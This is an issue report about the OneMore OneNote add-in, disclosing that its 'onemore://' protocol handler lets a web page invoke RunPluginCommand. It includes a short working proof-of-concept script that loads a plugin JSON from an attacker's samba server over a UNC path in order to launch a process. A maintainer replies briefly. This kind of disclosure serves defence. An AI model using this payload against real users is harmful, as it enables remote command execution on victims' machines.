Exposing RunPluginCommand to protocol handler may have some security issues

[maple3142]

I found that it is possible to call arbitrary commands using protocol handler onemore://... since CommandService.InvokeCommand calls CommandFactory.Invoke, which uses reflection to get a command to execute.

One of the command RunPluginCommand, which takes a path to json and will eventually call external process.

The problem with this is the url received from protocol handler may be malicious as it is possible to put something like <a href="onemore://..."></a> or use JavaScript to trigger it, so a attacker could abuse this together with UNC path and host a json on a samba server to get command execution on victim's machine.

For example, a victim visiting a webpage with the following html will see a browser prompt asking if they want to open Onemore or not. If the answer is yes and user also have OneNote currently opened then attacker would be able to execute calc.exe on victim's machine.

<script>
const samba = '1.2.3.4' // attacker's samba server
location.href = 'onemore://RunPluginCommand/%5C%5C' + samba+ '%5Cs%5Cplugin.json'
// plugin.json content: {"Name":"calc","Command":"calc.exe","Arguments":""}
</script>

I think it would be good to whilelist some specific safe commands only to prevent this from happening.

[jasonjac2]

good catch. I don't know how to solve this exactly, because you do want internally be able to invoke commands like this.